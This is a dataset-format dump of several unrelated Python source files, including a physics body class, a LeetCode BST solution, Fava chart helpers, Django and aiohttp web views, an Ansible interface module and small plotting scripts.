set_elasticity(self, elasticity: float):\n self.elasticity = elasticity\n return self\n\n def set_friction(self, friction: float):\n self.friction = friction\n return self\n\n def sef_velocity(self, v, v_y=None):\n if v_y is None:\n self.velocity.set(v.x, v.y)\n else:\n self.velocity.set(v, v_y)\n return self\n\n def set_angular_velocity(self, a_v):\n self.angular_velocity = a_v\n return self\n\n\nclass Body:\n\n def __init__(self, shape: Shape, body_def: Body_Def):\n self.body_def = body_def\n self._shape = shape\n\n self._force = Vector2(0, 0)\n self._moment_force = 0\n\n self._user_data = None\n\n self.body_def.i = moment_of_inertia(self._shape.vertices, body_def.mass, self.position)\n self._inv_i = 1 / self.body_def.i\n self._inv_m = 1 / body_def.mass\n\n def step(self, delta):\n if self.type == Body_Type.Static:\n pass\n elif self.type == Body_Type.Dynamic:\n self.body_def.velocity.x += self._force.x * self._inv_m * delta\n self.body_def.velocity.y += self._force.y * self._inv_m * delta\n self.body_def.angle += self.body_def.angular_velocity * delta\n self.body_def.pos.add(self.body_def.velocity.x * delta, self.body_def.velocity.y * delta)\n self._shape.update(self.angle, self.position)\n self._force.set(0, 0)\n\n def add_force(self, force, force_y=None):\n if force_y is None:\n self._force += force\n else:\n self._force.x += force\n self._force.y += force_y\n\n def add_position(self, x, y=None):\n if isinstance(x, Vector2):\n self.body_def.pos.x += x.x\n self.body_def.pos.y += x.y\n else:\n self.body_def.pos.x += x\n self.body_def.pos.y += y\n\n @property\n def position(self) -> Vector2:\n return self.body_def.pos\n\n @position.setter\n def position(self, pos):\n self.body_def.pos.set(pos.x, pos.y)\n\n @property\n def velocity(self) -> Vector2:\n return self.body_def.velocity\n\n @velocity.setter\n def velocity(self, v):\n if self.type != Body_Type.Static:\n self.body_def.velocity.set(v.x, v.y)\n\n @property\n def angular_velocity(self) -> float:\n return self.body_def.angular_velocity\n\n @angular_velocity.setter\n def angular_velocity(self, w: float):\n if self.type != Body_Type.Static:\n self.body_def.angular_velocity = w\n\n @property\n def vertices(self) -> list:\n return self._shape.vertices\n\n @vertices.setter\n def vertices(self, v: list):\n self._shape.vertices = v\n\n @property\n def angle(self) -> float:\n return self.body_def.angle\n\n @angle.setter\n def angle(self, angle: float):\n self.body_def.angle = angle\n\n @property\n def user_data(self):\n return self._user_data\n\n @user_data.setter\n def user_data(self, d):\n self._user_data = d\n\n @property\n def shape(self) -> Shape:\n return self._shape\n\n @property\n def elasticity(self):\n return self.body_def.elasticity\n\n @property\n def get_aaBb(self) -> AaBb:\n return self.shape.get_aaBb\n\n @property\n def type(self) -> Body_Type:\n return self.body_def.type\n\n @property\n def mass(self) -> float:\n return self.body_def.mass\n\n @property\n def i(self):\n return self.body_def.i\n","sub_path":"body.py","file_name":"body.py","file_ext":"py","file_size_in_byte":8722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"351611608","text":"#\r\n# @lc app=leetcode.cn id=1373 lang=python3\r\n#\r\n# [1373] 二叉搜索子树的最大键值和\r\n#\r\n# https://leetcode-cn.com/problems/maximum-sum-bst-in-binary-tree/description/\r\n#\r\n# algorithms\r\n# Hard (39.58%)\r\n# Likes: 55\r\n# Dislikes: 0\r\n# Total Accepted: 6.5K\r\n# Total Submissions: 16.4K\r\n# Testcase Example: '[1,4,3,2,4,2,5,null,null,null,null,null,null,4,6]'\r\n#\r\n# 给你一棵以 root 为根的 二叉树 ,请你返回 任意 二叉搜索子树的最大键值和。\r\n# \r\n# 二叉搜索树的定义如下:\r\n# \r\n# \r\n# 任意节点的左子树中的键值都 小于 此节点的键值。\r\n# 任意节点的右子树中的键值都 大于 此节点的键值。\r\n# 任意节点的左子树和右子树都是二叉搜索树。\r\n# \r\n# \r\n# \r\n# \r\n# 示例 1:\r\n# \r\n# \r\n# \r\n# \r\n# 输入:root = [1,4,3,2,4,2,5,null,null,null,null,null,null,4,6]\r\n# 输出:20\r\n# 解释:键值为 3 的子树是和最大的二叉搜索树。\r\n# \r\n# \r\n# 示例 2:\r\n# \r\n# \r\n# \r\n# \r\n# 输入:root = [4,3,null,1,2]\r\n# 输出:2\r\n# 解释:键值为 2 的单节点子树是和最大的二叉搜索树。\r\n# \r\n# \r\n# 示例 3:\r\n# \r\n# \r\n# 输入:root = [-4,-2,-5]\r\n# 输出:0\r\n# 解释:所有节点键值都为负数,和最大的二叉搜索树为空。\r\n# \r\n# \r\n# 示例 4:\r\n# \r\n# \r\n# 输入:root = [2,1,3]\r\n# 输出:6\r\n# \r\n# \r\n# 示例 5:\r\n# \r\n# \r\n# 输入:root = [5,4,8,3,null,6,3]\r\n# 输出:7\r\n# \r\n# \r\n# \r\n# \r\n# 提示:\r\n# \r\n# \r\n# 每棵树有 1 到 40000 个节点。\r\n# 每个节点的键值在 [-4 * 10^4 , 4 * 10^4] 之间。\r\n# \r\n# \r\n#\r\n\r\n# @lc code=start\r\n# Definition for a binary tree node.\r\n# class TreeNode:\r\n# def __init__(self, val=0, left=None, right=None):\r\n# self.val = val\r\n# self.left = left\r\n# self.right = right\r\nclass Solution:\r\n def maxSumBST(self, root: TreeNode) -> int:\r\n self.maxSum = float('-inf')\r\n def traverse(root):\r\n if root is None:\r\n # 返回一个长度为4的数组,res[0]为以root为根的二叉树是否是BST\r\n # root[1]记录以root为根二叉树所有节点的最小值\r\n # root[2]记录以root为根二叉树所有节点的最大值\r\n # root[3]记录以root为根的二叉树所有节点值之和\r\n return [1, float('inf'), float('-inf'), 0] \r\n \r\n left = traverse(root.left)\r\n right = traverse(root.right)\r\n\r\n res = [0] * 4\r\n # 判断是否当前节点为根是否是二叉树\r\n if left[0] == 1 and right[0] == 1 and root.val > left[2] and root.val < right[1]:\r\n res[0] = 1\r\n res[1] = min(left[1], root.val)\r\n res[2] = max(right[2], root.val)\r\n res[3] = left[3] + right[3] + root.val\r\n self.maxSum = max(self.maxSum, res[3])\r\n else:\r\n res[0] = 0\r\n return res\r\n \r\n return traverse(root)[-1]\r\n \r\n\r\n# @lc code=end\r\n\r\n","sub_path":"leetcode/1373.二叉搜索子树的最大键值和.py","file_name":"1373.二叉搜索子树的最大键值和.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"399828026","text":"\"\"\"Provide data suitable for Fava's charts. \"\"\"\nfrom datetime import date, datetime\n\nfrom beancount.core.amount import Amount\nfrom beancount.core.number import Decimal\nfrom beancount.core.position import Position\nfrom beancount.core.inventory import Inventory\nfrom beancount.core import realization\nfrom beancount.core.data import iter_entry_dates\nfrom flask.json import JSONEncoder\n\nfrom fava.core.helpers import FavaModule\nfrom fava.core.holdings import net_worth_at_dates\n\n\nclass FavaJSONEncoder(JSONEncoder):\n\n def default(self, o): # pylint: disable=E0202\n if isinstance(o, datetime):\n return o.strftime('%Y-%m-%dT%H:%M:%SZ')\n elif isinstance(o, date):\n return o.strftime('%Y-%m-%d')\n elif isinstance(o, Decimal):\n return float(o)\n elif isinstance(o, Amount):\n return str(o)\n elif isinstance(o, Position):\n return str(o)\n elif isinstance(o, (set, frozenset)):\n return list(o)\n try:\n return JSONEncoder.default(self, o)\n except TypeError:\n # workaround for #472\n try:\n return str(o)\n except TypeError:\n return ''\n\n\ndef _serialize_inventory(inventory, at_cost=False):\n \"\"\"Renders an Inventory to a currency -> amount dict.\"\"\"\n if at_cost:\n inventory = inventory.cost()\n else:\n inventory = inventory.units()\n return {p.units.currency: p.units.number for p in inventory}\n\n\ndef _real_account(account_name, entries, begin_date, end_date):\n if begin_date:\n entries = list(iter_entry_dates(entries, begin_date, end_date))\n\n return realization.get_or_create(realization.realize(entries),\n account_name)\n\n\ndef _serialize_real_account(real_account):\n return {\n 'account': real_account.account,\n 'balance_children':\n _serialize_inventory(realization.compute_balance(real_account),\n at_cost=True),\n 'balance': _serialize_inventory(real_account.balance, at_cost=True),\n 'children': [_serialize_real_account(a)\n for n, a in sorted(real_account.items())],\n }\n\n\nclass ChartModule(FavaModule):\n __slots__ = ['ledger']\n\n def _total_balance(self, names, begin_date, end_date):\n totals = [realization.compute_balance(\n _real_account(account_name, self.ledger.entries, begin_date,\n end_date))\n for account_name in names]\n return _serialize_inventory(sum(totals, Inventory()),\n at_cost=True)\n\n def events(self, event_type):\n return [{\n 'type': entry.type,\n 'date': entry.date,\n 'description': entry.description\n } for entry in self.ledger.events(event_type)]\n\n def hierarchy(self, account_name, begin_date=None, end_date=None):\n real_account = _real_account(\n account_name, self.ledger.entries, begin_date, end_date)\n return _serialize_real_account(real_account)\n\n def interval_totals(self, interval, account_name):\n \"\"\"Renders totals for account (or accounts) in the intervals.\"\"\"\n if isinstance(account_name, str):\n names = [account_name]\n else:\n names = account_name\n\n interval_tuples = self.ledger._interval_tuples(interval)\n return [{\n 'begin_date': begin_date,\n 'totals': self._total_balance(\n names,\n begin_date, end_date),\n 'budgets': self.ledger.budgets.calculate(names[0], begin_date,\n end_date),\n } for begin_date, end_date in interval_tuples]\n\n def linechart(self, account_name):\n real_account = realization.get_or_create(self.ledger.root_account,\n account_name)\n postings = realization.get_postings(real_account)\n journal = realization.iterate_with_balance(postings)\n\n return [{\n 'date': entry.date,\n # when there's no holding for a commodity, it will be missing from\n # 'balance' field but appear in 'change' field. Use 0 for those\n # commodities.\n 'balance': dict({curr: 0 for curr in list(change.currencies())},\n **_serialize_inventory(balance)),\n } for entry, _, change, balance in journal if len(change)]\n\n def net_worth_at_dates(self, interval):\n interval_tuples = self.ledger._interval_tuples(interval)\n if not interval_tuples:\n return []\n\n dates = [interval_tuples[0][0]] + [p[1] for p in interval_tuples]\n\n return net_worth_at_dates(self.ledger.entries, dates,\n self.ledger.price_map,\n self.ledger.options)\n","sub_path":"fava/core/charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"167227555","text":"from rest_framework.generics import CreateAPIView\nfrom .serializers import CalculateSerializer\nfrom .models import Calculate\n\n\nclass CalculateCreateView(CreateAPIView):\n queryset = Calculate.objects.all()\n serializer_class = CalculateSerializer\n\n def post(self, request, *args, **kwargs):\n r = super(CalculateCreateView, self).create(request)\n # call the calculation funcion\n self.calculate_qrisk()\n return r\n\n def calculate_qrisk(self):\n from libs import qrisk_male, qrisk_female\n\n data = self.request.data\n\n cholesterol = 0.0 if data.get('cholesterol') == '' else data.get('cholesterol')\n sytolic = 0.0 if data.get('sytolic') == '' else data.get('sytolic')\n town = 0.0\n b_AF = 0.0 if data.get('atrial_fibrillation') is None else data.get('atrial_fibrillation')\n b_ra = 0.0 if data.get('rheumatoid') is None else data.get('rheumatoid')\n b_renal = 0.0 if data.get('kidney') is None else data.get('kidney')\n b_treatedhyp = 0.0 if data.get('on_blood_pressure_treatment') is None else data.get('on_blood_pressure_treatment')\n angina = 0.0 if data.get('angina') is None else data.get('angina')\n\n if data.get('sex') == 'M':\n result = qrisk_male.cvd_male_raw(\n int(data.get('age')), b_AF,\n b_ra, b_renal,\n b_treatedhyp, 0.0, 0.0, 1.0,\n int(data.get('ethny')), angina, cholesterol,\n sytolic, int(data.get('smoke')), 0.0, town)\n print(result)\n else:\n result = qrisk_female()\n\n return result\n","sub_path":"calculate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"26995361","text":"#!/usr/bin/python\n\nimport os\nimport logging\nimport requests\nimport copy\nimport ast\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.pask_prestapi import PrestApi,\\\n OP_DELETE, OP_GET, OP_POST, OP_PUT\nfrom ansible.module_utils.pask_module import PaskModule, try_except\n\n\ninner_ip_args = dict(\n address=dict(type='str', required=True),\n broadcast=dict(type='str'),\n overlapped=dict(type='str')\n)\n\ninner_ip6_args = dict(\n address=dict(type='str', required=True),\n broadcast=dict(type='str'),\n)\n\ninner_ip6_args['adv-on-link'] = dict(type='str')\ninner_ip6_args['adv-autonomous'] = dict(type='str')\ninner_ip6_args['adv-router-addr'] = dict(type='str')\ninner_ip6_args['adv-valid-lifetime'] = dict(type='str')\ninner_ip6_args['adv-preferred-lifetime'] = dict(type='str')\n\nmodule_args = dict(\n name=dict(type='str', required=True),\n ip=dict(type='dict', options=inner_ip_args),\n ip6=dict(type='dict', options=inner_ip6_args),\n mtu=dict(type='str'),\n rpf=dict(type='str'),\n status=dict(type='str'),\n)\n\nmodule_args['adv-cur-hop-limit'] = dict(type='str')\nmodule_args['adv-default-lifetime'] = dict(type='str')\nmodule_args['adv-reachable-time'] = dict(type='str')\nmodule_args['adv-retrans-timer'] = dict(type='str')\nmodule_args['adv-send-advert'] = dict(type='str')\nmodule_args['max-rtr-adv-interval'] = dict(type='str')\nmodule_args['min-rtr-adv-interval'] = dict(type='str')\n\nname = 'interface'\n\n\nclass PaskInterface(PaskModule):\n def __init__(self, name, module_args):\n super(PaskInterface, self).__init__(name, module_args)\n\n @try_except\n def run(self):\n data = self.make_data(self.module.params, include_inner=True)\n url = os.path.join(self.url, self.module.params['name'])\n self.resp= self.put(url, data)\n\n\ndef main():\n interface = PaskInterface(name, module_args)\n interface.set_param()\n interface.run()\n interface.set_result()\n\nif __name__ == '__main__':\n main()\n","sub_path":"library/pask_interface.py","file_name":"pask_interface.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"191797940","text":"import networkx as nx\nimport utility\n\nmseed = utility.mGraph()\nmseed.load_from_file('eval.mgraph')\n\nm = utility.mGraph()\nm.load_from_file('../max_degree_3.mgraph')\n\ndd = nx.degree_histogram(mseed.g) ## for graph degree\ndd = [i / sum(dd) for i in dd]\ndd_bin = mseed.get_dd_bin()\ndd_bin = [i / sum(dd_bin) for i in dd_bin]\ndd2_bin = mseed.get_dd2_bin()\n\n#print(dd)\nprint(dd_bin)\nprint(dd2_bin)\n\ndd = nx.degree_histogram(m.g) ## for graph degree\ndd = [i / sum(dd) for i in dd]\ndd_bin = m.get_dd_bin()\ndd_bin = [i / sum(dd_bin) for i in dd_bin]\ndd2_bin = m.get_dd2_bin()\n\n#print(dd)\nprint(dd_bin)\nprint(dd2_bin)\n","sub_path":"marsQuery/cal_degree.py","file_name":"cal_degree.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"600237587","text":"import math\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#parte 3\ndef exponential(x):\n time = np.log(np.random.uniform()) *-1\n\n return time/x\n\n\ndef strati(values_list): \n\tprint(\"rango 0 a 1:\")\n\tev = 0\n\tfor i in range(len(values_list[0:10])):\n\t\tev = ev + (i/10)*(values_list[i])\n\tprint(\"valor esperado es: \", ev)\n\n\tev = 0\n\tprint(\"rango 1 a 3:\")\n\tfor i in range(len(values_list[10:30])):\n\t\tev = ev + (i+10)*(values_list[i+10])\n\tprint(\"valor esperado es: \", ev/10)\n\n\tev = 0\n\tprint(\"rango 3 a infinito:\")\n\tfor i in range(len(values_list[30:])):\n\t\tev = ev + (i+30)*(values_list[i+30])\n\tprint(\"valor esperado es: \", ev/10000)\n\n\nx_values =[]\ny_values =[]\nfor i in range(1,10000):\n\tx_values.append(i)\n\ty_values.append(exponential(i))\n\nstrati(values_list = y_values)\n\nplt.plot(y_values)\nplt.savefig('books_read.png')\n","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"293273551","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\n#import cProfile\nimport time\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nstart = time.time()\n\n\ndef excel_mode():\n start = time.time()\n for i in range(3):\n df0 = pd.read_csv('ex.csv')\n print(i)\n end = time.time()\n print('excel_mode duration:',str(end-start))\n#print(df0.describe())\n\ndef txt_mode():\n start = time.time()\n for i in range(3):\n df1 = pd.read_table('ex.txt',sep='\\t',encoding='gb2312')\n print(i)\n end = time.time()\n print('txt_mode duration:',str(end-start))\n\nexcel_mode()\ntxt_mode()\n\n#df0 = pd.read_excel('ex.xlsx')\n#df0 = pd.read_table('ex.txt',sep='\\t',encoding='gb2312')\n#fig = plt.figure()\n##ax = fig.add_subplot(111)\n#df0.boxplot(column= 'ADC',by='SBR')\n##sns.boxplot(x='SBR',y='ADC',data=df0)\n#print(df0.groupby('SBR')['ADC'].agg([np.mean,np.std,'count']))\n#end = time.time()\n#print('test time:',str(end-start))","sub_path":"2-work/Python/python-Intv/company_plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"42364336","text":"# -*- coding: utf-8 -*-\n\"\"\" Module intis data in DB \"\"\"\nimport logging\nfrom arttest.services import (ArticlesService, AccountService,ArticleTypesService, SubscribersService)\nfrom arttest.models.models import (Article, Account, ArticleType, Subscriber)\nfrom arttest.logic.helpers import dt_to_text\n\nLOG = logging.getLogger(__name__)\n\nclass InitDB(object):\n \"\"\" docstring for InitDB \"\"\"\n def __init__(self):\n self.articles = ArticlesService()\n self.accounts = AccountService()\n self.types = ArticleTypesService()\n self.subscribers = SubscribersService()\n self.dgroups = {}\n\n def add(self):\n \"\"\" Inits DB \"\"\"\n LOG.info(\"Initializing db data\")\n try:\n if self.types.count() == 0:\n self.init_article_types()\n if self.accounts.count() == 0:\n self.init_admin()\n LOG.info(\"Successfully finished\")\n except Exception as ex:\n LOG.error(\"An error occured while Initializing db data\")\n LOG.exception(ex)\n\n def init_admin(self):\n \"\"\" Inits first admin user \"\"\"\n account = Account()\n account.login = \"admin\"\n account.password = \"admin01\"\n account.name = \"Admin\"\n account.lastname = \"Admin\"\n account.permissions = \"Admin\"\n self.accounts.add(account)\n\n def init_article_types(self):\n \"\"\"Adds article types to DB \"\"\"\n # Init first\n article_type = ArticleType()\n article_type.code = 'grey'\n article_type.name = 'Szary'\n article_type.color = '#242424'\n # Init second\n article_type2 = ArticleType()\n article_type2.code = 'red'\n article_type2.name = 'Czerwony'\n article_type2.color = '#bddbbb'\n # Init second\n article_type3 = ArticleType()\n article_type3.code = 'green'\n article_type3.name = 'Zielony'\n article_type3.color = '#18c118'\n self.types.add(article_type)\n self.types.add(article_type2)\n self.types.add(article_type3)\n\n def init_subscriber(self):\n \"\"\" inits subscriber \"\"\"\n sub = Subscriber()\n sub.name = \"aaaa\"\n sub.lastname = \"dsadsad\"\n sub.email = \"SSS@sds\"\n sub = self.subscribers.add(sub)\n LOG.debug(str(sub.id))\n\n ","sub_path":"arttest/scripts/initdb.py","file_name":"initdb.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"83010535","text":"\"\"\"Turtle彩虹绘制\"\"\"\nimport turtle as t\n\n\ndef init(x, y, z, speed):\n t.setup(x, y)\n t.pensize(z)\n t.speed(speed)\n\n\ndef start(start, end):\n t.penup()\n t.setx(start)\n t.sety(end)\n t.pendown()\n\n\ndef draw(color, position, radius, extend):\n t.pendown()\n t.left(position)\n t.color(color)\n t.circle(radius, extend)\n t.penup()\n\n\ninit(800, 800, 20, 10)\n\nstart(100, 0)\ndraw('red', 90, 100, 180)\nstart(120, 0)\ndraw('orange', 180, 120, 180)\nstart(140, 0)\ndraw('yellow', 180, 140, 180)\nstart(160, 0)\ndraw('green', 180, 160, 180)\nstart(180, 0)\ndraw('cyan', 180, 180, 180)\nstart(200, 0)\ndraw('blue', 180, 200, 180)\nstart(220, 0)\ndraw('purple', 180, 220, 180)\nt.done()\n","sub_path":"L2/2_Rainbow.py","file_name":"2_Rainbow.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"126306128","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.utils.encoding import python_2_unicode_compatible\nfrom django.shortcuts import render\nfrom models import Question, Choice, Build\nfrom django.http import JsonResponse,HttpResponseRedirect,Http404,HttpResponse\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import auth\nfrom django.core import serializers\nimport json\n\nlogin_url='/login/'\n\n@login_required(login_url=login_url)\ndef get_data_quest(request):\n data = Build.objects.all()[:170]\n requestData=[]\n for i in request.META:\n requestData.append([i,request.META[i]])\n return render(request,r'grid/GridJQuery/index.htm',{'data': data,\n 'requestData':requestData})\n\n\n@login_required(login_url=login_url)\ndef sb_admin(request):\n data = Build.objects.all()[:170]\n return render(request,r'grid/Bootstrap/index.html')\n\n@login_required(login_url=login_url)\ndef sb_tables(request):\n return render(request,r'grid/Bootstrap/tables.html')\n\n@login_required(login_url=login_url)\ndef map(request):\n return render(request,r'v1/map-element.html',{'Dashboard':'',\n 'info':'Карта присутності провадерів інтернет','map':True})\n\n@login_required(login_url=login_url)\ndef build_detal_information(request):\n id=int(request.GET['id'])\n data = Build.objects.get(id=id)\n adress=str(data)\n balans=str(data.balans)\n service=str(data.service)\n\n return JsonResponse({'adress':adress,'balans':balans,'service':service})\n\n\n@login_required(login_url=login_url)\n@csrf_exempt # декоратор вимикає перевірку csrf -токена !!!!!!!!!!!!\ndef send_claim(request):\n id=int(request.POST['id'])\n data = Build.objects.get(id=id)\n adress=str(data)\n balans=str(data.balans)\n service=str(data.service)\n return JsonResponse({'adress':adress,'balans':balans,'service':service})\n\n@login_required(login_url=login_url)\ndef test_build(request):\n data = Build.objects.all()[1:2].values_list()\n requestData=[]\n for i in data:\n requestData.append(i)\n return render(request,r'map/Object_detal_information.html',{'requestData':requestData})\n\n\ndef login(request):\n return render(request,r'v1/login-form.html')\n\n@login_required(login_url=login_url)\ndef base(request):\n return render(request,r'v1/base.html')\n\ndef tables(request):\n return render(request,r'v1/table.html')\n\n\n##@csrf_exempt # декоратор вимикає перевірку csrf -токена !!!!!!!!!!!!\ndef login_validate(request):\n html = \"Ніхуя не вийшло \"\n if request.method == 'POST':\n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n user = auth.authenticate(username=username, password=password)\n if user is not None and user.is_active:\n # Пароль правилен и пользователь “активный”\n auth.login(request, user)\n # Переадресовать на страницу успешного входа.\n return HttpResponseRedirect('../')\n else:\n # Переадресовать на страницу ошибок\n return HttpResponse(html)\n else:\n # Переадресовать на страницу ошибок\n return HttpResponse(html)\n\ndef logout(request):\n auth.logout(request)\n # Переадресовать на страницу успешного выхода.\n return HttpResponseRedirect(\"/login/\")\n\n@login_required(login_url=login_url)\ndef get_build_table_data(request):\n data = Build.objects.all()[:1000]\n jasonDatalist=[]\n for i in data:\n jasonDatalist.append([str(i),str(i.balans),str(i.service)])\n r=json.dumps(jasonDatalist)\n return HttpResponse(r, content_type=\"application/json\")\n\n\n","sub_path":"drtm/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"299292541","text":"\"\"\"Support functions for verification of embedded license claims.\"\"\"\n\n__id__ = \"$Id$\"\n__version__ = \"$Revision$\"\n__copyright__ = '(c) 2004, Creative Commons, Nathan R. Yergler'\n__license__ = 'licensed under the GNU GPL2'\n\nimport ccrdf\nimport ccrdf.rdfextract as rdfextract\n\nimport cctagutils.rdf\nfrom cctagutils.metadata import metadata\n\ndef parseClaim(claim):\n results = {}\n\n vtext = 'verify at '\n vloc = claim.find(vtext)\n if vloc != -1:\n results['verify at'] = claim[vloc+len(vtext):].strip()\n claim = claim[:vloc]\n\n ltext = \"licensed to the public under \"\n lloc = claim.lower().find(ltext)\n if lloc != -1:\n results['license'] = claim[lloc+len(ltext):].strip()\n claim = claim[:lloc]\n\n results['copyright'] = claim.strip()\n\n return results\n\ndef lookup(filename):\n \"\"\"Returns True of False if the embedded claim can be verified.\"\"\"\n \n if verify(filename) > 0:\n return True\n else:\n return False\n \ndef verify(filename):\n \"\"\"Extracts license claim information from a file and verifies it.\n Returns the following status codes:\n 1 Verified\n 0 No RDF\n -1 Work information not found (possible SHA1 mismatch)\n -2 Verification license does not match claim.\n \"\"\"\n\n status = 0\n \n claim = metadata(filename).getClaim()\n if claim is None:\n raise cctag.exceptions.NotLicensedException\n \n fileinfo = parseClaim(claim)\n fileinfo['sha'] = 'urn:sha1:%s' % cctag.rdf.fileHash(filename)\n\n verifyRdf = rdfextract.RdfExtractor().extractRdfText(\n rdfextract.retrieveUrl(fileinfo['verify at'])\n )\n\n # check if we found any RDF at all, and update the status code\n if len(verifyRdf) > 0:\n status = -1\n\n # check each block of RDF\n # (a verification page may also have it's own license RDF embedded)\n for block in verifyRdf:\n # parse/validate the RDF\n verifyCc = ccrdf.ccRdf()\n verifyCc.parse(block)\n\n # for each work in the RDF block...\n for work in verifyCc.works():\n \n # if the subject matches...\n if work.subject == fileinfo['sha']:\n # we found the work information;\n # only one reason left to not verify\n status = -2\n \n # we found the work, now make sure the license matches\n for license in work.licenses():\n if license == fileinfo['license']:\n return 1\n\n # either the file wasn't found, or the license didn't match\n return status\n","sub_path":"spotlight/Source/cctagutils/lookup.py","file_name":"lookup.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"185838878","text":"from Problem3 import mcdm\r\nfrom Problem3.graphrank import *\r\nimport requests\r\n\r\n# {'id': 1, 'distanceCityLink': 73.15100000000001, 'distancePosLaju': 39.28, 'distanceGdex': 76.682, 'distanceJnT': 66.071, 'distanceDHL': 58.685, 'shortestDistance': 'Pos Laju', 'distanceShortest': 39.28, 'customer': 1}\r\n\r\ndef dist_adapter(resp):\r\n if resp.status_code != 200:\r\n print(\"Nothing fishy here...\")\r\n return None\r\n raw = resp.json()\r\n return {'City-Link Express': raw['distanceCityLink'], 'DHL': raw['distanceDHL'], 'GDEX': raw['distanceGdex'], 'J&T': raw['distanceJnT'], 'Pos Laju': raw['distancePosLaju']}\r\n\r\ndef prob3():\r\n r = requests.get('http://algoprojq1.herokuapp.com/api/distance/1') \r\n distance = dist_adapter(r) or {'City-Link Express': 30, 'DHL': 80, 'GDEX': 55, 'J&T': 63, 'Pos Laju': 70}\r\n try:\r\n from Problem2 import prob2\r\n semantic = prob2(gimme_senti=True)\r\n except:\r\n semantic = {'City-Link Express': 8.5, 'DHL': 6.4, 'GDEX': 9.3, 'J&T': 1.87, 'Pos Laju': 4.86}\r\n \r\n # lists from dict for mcdm\r\n courier_company = list(semantic.keys())\r\n distance_list = list(distance.values())\r\n semantic_list = list(semantic.values())\r\n # multi criteria decision making\r\n mcdm.min_normalize(distance_list)\r\n mcdm.max_normalize(semantic_list)\r\n mcdm_list = mcdm.mcdm_weighted_sum(distance_list, 0.5, semantic_list, 0.5) # result\r\n mcdm_dict = dict(zip(courier_company, mcdm_list))\r\n print(\"multi criteria decision making result: \", mcdm_dict)\r\n # plot graph for most to least recommended ranking\r\n return graphrank.plot_graph_rank(mcdm_dict)\r\n","sub_path":"Problem3/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"523448772","text":"# -*- coding:utf-8 -*-\n# @Time : 2019-08-18 11:33\n# @Author : 胡远\n# @Github : https://github.com/QuixoteHY\n# @Email : 1290482442@qq.com\n# @Describe :\n\nimport asyncio\n\nfrom aiohttp import web\n\nfrom common.logger import logger\n\nfrom data_server_interface.python3.settings import SERVER_HOST, SERVER_PORT, HEARTBEAT_INTERVAL\nfrom data_server_interface.python3.controller import Controller\n\n\ndef _heartbeat(loop, interval):\n try:\n logger.info('心跳:'+str(interval)+'s')\n except Exception as e:\n logger.info(logger.exception(e))\n loop.call_later(interval, _heartbeat, loop, interval)\n\n\ndef start_heartbeat(loop, interval):\n _heartbeat(loop, interval)\n\n\nclass MainHandler:\n def __init__(self):\n self.controller = Controller()\n\n async def get_stock_info(self, request):\n remote = request.remote\n logger.info(str(remote))\n try:\n financial_statement_type = request.match_info.get('financial_statement_type', '')\n ts_code = request.match_info.get('ts_code', '')\n if not ts_code:\n return web.json_response({'status': 'no ts_code in your request url'})\n if financial_statement_type == 'balance_sheet':\n self.controller.get_balance_sheet(ts_code)\n return web.json_response({})\n elif financial_statement_type == 'fina_indicators':\n return web.Response(body=self.controller.get_fina_indicators(ts_code).encode('utf-8'),\n content_type='text/html')\n except Exception as e:\n logger.info(logger.exception(e))\n return web.json_response({'status': 'error in server'})\n\n\nasync def init(loop):\n app = web.Application(loop=loop)\n handler = MainHandler()\n #\n # 获取某上市公司资产负债表信息\n # http://127.0.0.1:8888/get/stock/{financial_statement_type}/{ts_code}\n app.router.add_get('/get/stock/{financial_statement_type}/{ts_code}', handler.get_stock_info)\n #\n # server = await loop.create_server(app.make_handler(), SERVER_HOST, SERVER_PORT)\n # logger.info('\\n\\tServer started at http://%s:%s...' % (SERVER_HOST, SERVER_PORT))\n # return server\n runner = web.AppRunner(app)\n await runner.setup()\n site = web.TCPSite(runner, SERVER_HOST, SERVER_PORT)\n logger.info('\\n\\tServer started at http://%s:%s...' % (SERVER_HOST, SERVER_PORT))\n await site.start()\n\nif __name__ == '__main__':\n _loop = asyncio.get_event_loop()\n _loop.run_until_complete(init(_loop))\n start_heartbeat(_loop, HEARTBEAT_INTERVAL)\n 